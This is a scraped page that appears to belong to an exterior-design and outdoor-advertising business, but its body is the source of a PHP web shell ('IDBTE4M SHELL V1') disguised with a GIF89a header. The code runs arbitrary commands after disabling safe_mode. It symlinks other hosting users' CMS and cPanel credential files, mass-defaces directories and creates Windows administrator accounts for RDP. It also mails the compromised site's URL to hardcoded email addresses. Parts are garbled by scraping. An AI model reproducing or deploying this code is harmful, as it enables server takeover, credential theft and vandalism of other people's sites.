exterior design

Werbeflächengestaltung,Plakatfoto,Plakatwerbung,Außenwerbung, Bühnenbau, Außengestaltung

GIF89a;


@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
$asui = getcwd() . "/";
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$ini = "fopen";
$fw = "fwrite";
$ada = "function_exists";
$crot = "shell_exec";
if (isset($_POST['cmd'])) {
$mulai = $ini('php.ini', 'w');
$buat = " safe_mode = OFF n
disable_functions = NONE n
safe_mode_gid = OFF n
open_basedir = OFF n
register_globals = ON n
exec = ON n
shell_exec = ON n";
$fw($mulai, $buat);
if ($ada('shell_exec')) {
$lihat = $_POST['cmd'];
$hasil = $crot("$lihat");
echo "
$hasil
";
}

}

if($_GET['do'] == 'config') {
@ini_set('max_execution_time',0);
@ini_set('display_errors', 0);
@ini_set('file_uploads',1);
echo '





';}
if ($_POST['conf']) {
$folfig = $_POST['folfig']; $type = $_POST['type'];
@mkdir($folfig, 0755);
@chdir($folfig);
$htaccess="
Options Indexes FollowSymLinks
\nDirectoryIndex .my.cnf
\nAddType txt .php
\nAddType txt .my.cnf
\nAddType txt .accesshash
\nAddHandler txt .php
\nAddHandler txt .cnf
\nAddHandler txt .accesshash
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("\n",$_POST["passwd"]); echo "
tunggu sebentar ya ...
";
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
@symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
@symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
@symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
@symlink('/home/'.$user.'/public_html/connect.php',$user.'-8.txt');
@symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
@symlink('/home/'.$user.'/public_html/include/config.php',$user.'-12.txt');
@symlink('/home/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
@symlink('/home/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
@symlink('/home/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
@symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
@symlink('/home/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
@symlink('/home/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
echo '
Selesai mas/mba bro untuk melihat hasilnya klik -> '.$folfig.'';

}
}
if($_GET['do'] == 'mass_deface') {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[DONE] $lokasi
";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[DONE] $dirb/$namafile
";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe_sabun'] == 'mahal') {
echo "
echo "
";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "
echo "
";
}
} else {
echo "
";
echo "

Tipe Sabun BiasaMassal

Folder

Filename

Index File

$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo "
";
foreach($urls as $url) {
$web_vh = "/var/www/vhosts/$url/httpdocs";
if(is_dir($web_vh) === true) {
if(is_readable($web_vh)) {
$i++;
$jrw = "[R] $web_vh
";
if(is_writable($web_vh)) {
$jrw = "[RW] $web_vh
";
}
echo $jrw."
";
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "
";
} else {
echo '


List Domains:



";
$etc = fopen("/etc/passwd", "r");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "Can't read /etc/passwd";
} else {
preg_match_all('/(.*?): x foreach($user_jumping[1] as $user_idx_jump) {
$user_jumping_dir = "/home/$user_idx_jump/public_html";
if(is_readable($user_jumping_dir)){
$i++;
$jrw = "[R] $user_jumping_dir
";
if(is_writable($user_jumping_dir)) {
$jrw = "[RW] $user_jumping_dir
";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( gabisa ambil nama domain nya )
";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_idx_jump) {
echo " => ( $dj )
";
break;
}
}
}
} else {
echo "
";
}
}
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "";
}
echo "
";
}
if($_GET['do'] == 'wpm') {
echo "


Kontooooooooooooool





PASS:





NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex }
}
if($_GET['do'] == 'RDP') {
echo '

-| Create RDP |-


User : Pass





-{ Option }-





';
}
if($_POST['submit']){
echo "

---------------{ INFO }---------------

";
if($_POST['kshell']=="1"){
$r_user = $_POST['username'];
$r_pass = $_POST['password'];
$cmd_cek_user = shell_exec("net user");
if(preg_match("/$r_user/", $cmd_cek_user)){
echo $gaya_root.$r_user." sudah ada".$o;
}else {
$cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
$cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
$cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
$cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");

if($cmd_add_user){
echo $gaya_root."

[add user]-> ".$r_user." Berhasil

".$o;
}else {
echo $gaya_root."

[add user]-> ".$r_user." Gagal

".$o;
}
if($cmd_add_groups1){
echo $gaya_root."

[add localgroup Administrators]-> ".$r_user." Berhasil

".$o;
}else
if($cmd_add_groups2){
echo $gaya_root."

[add localgroup Administrator]-> ".$r_user." Berhasil

".$o;
}else
if($cmd_add_groups3){
echo $gaya_root."

[add localgroup Administrateur]-> ".$r_user." Berhasil

".$o;
}else {
echo $gaya_root."

[add localgroup]-> ".$r_user." Gagal - Contact Shor7sec

".$o;
}
echo $gaya_root."

[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password
}



}else if($_POST['kshell']=="2"){

if($_POST['aksi']=="1"){
echo "

".shell_exec("net user");
}
else if($_POST['aksi']=="2"){
$username = $_POST['rusername'];
$cmd_cek_user = shell_exec("net user");
if (!empty($username)){
if(preg_match("/$username/", $cmd_cek_user)){
$cmd_add_user = shell_exec("net user ".$username." /DELETE");
if($cmd_add_user){
echo $gaya_root."

[remove user]-> ".$username." Berhasil

".$o;
}else {
echo $gaya_root."

[remove user]-> ".$username." gagal

".$o;
}
}else {
echo $gaya_root."

[remove user]-> ".$username." Tidak ditemukan

".$o;
}
}else {
echo $gaya_root."

[PESAN]-> Kamu lupa masukin Username yang akan di delete

".$o;
}
}else if($_POST['aksi']=="3"){
$username = $_POST['rusername'];
$password = "jancok";
$cmd_cek_user = shell_exec("net user");
if (!empty($username)){
if(preg_match("/$username/", $cmd_cek_user)){
$cmd_add_user = shell_exec("net user ".$username." jancok");
if($cmd_add_user){
echo $gaya_root."

[change password]-> (".$username."|".$password.") Berhasil

".$o;
}else {
echo $gaya_root."

[change password]-> (".$username."|".$password.") GAGAL

".$o;
}
}else
{
echo $gaya_root."

[PESAN]-> Username Tidak Ditemukan di server

".$o;
}
}else
{
echo $gaya_root."

[PESAN]-> Kamu lupa masukin Username yang akan di delete

".$o;
}

}

}

}
?>
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'kefiex403@gmail.com,kefiex@hotmail.com';
$x_path = "http: //" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path : p *IP Address mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>



@ini_set('log_errors',0);
@ini_set('output_buffering',0);
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '
-_-







-=[+] IDBTE4M SHELL V1 [+]=-



';
echo '
'.php_uname().'

';
echo '';
if(isset($_GET['filesrc'])){
echo "








+ [ Home ]-[ Wp Mass ]-[ Jumping ]-[ Mass Deface ]-[ KRDP ]-[ Config Grab ]-[ Cp Krek ] +



';
echo 'IDBTE4M #>';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '/';
continue;
}
if($pat == '') continue;
echo ' if($i != $id) echo "/";
}
echo '">'.$pat.'
/';
}
echo '
';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo 'OK COK SUKSESS !!
';
}else{
echo 'ASU RAIMU ELK : P
';
}
}
echo '





Current File : ";
echo $_GET['filesrc'];
echo '

';
echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '
'.$_POST['path'].'

';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo 'Change Permission Done.
';
}else{
echo 'Change Permission Error.
';
}
}
echo '

Permission :



';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo 'Change Name Done.
';
}else{
echo 'Change Name Error.
';
}
$_POST['name'] = $_POST['newname'];
}
echo '

New Name :



';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo 'Edit File Done.
';
}else{
echo 'Edit File Error.
';
}
fclose($fp);
}
echo '






';
}
echo '
';
}else{
echo '
';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo 'Delete Dir Done.
';
}else{
echo 'Delete Dir Error.
';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo 'Delete File Done.
';
}else{
echo 'Delete File Error.
';
}
}
}
echo '
';
$scandir = scandir($path);
echo '






';

foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "




";
}
echo '';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo "




";
}
echo '
Name
Size
Permissions
Options
$dir
--
";
if(is_writable("$path/$dir")) echo '';
elseif(!is_readable("$path/$dir")) echo '';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '
';

echo "





\" />
$file
".$size."
";
if(is_writable("$path/$file")) echo '';
elseif(!is_readable("$path/$file")) echo '';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '
';
echo "





\" />

';
}
echo '

';
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) (($perms & 0x0200) ? 'T' : '-'));

return $info;
}
?>

 

 

test: test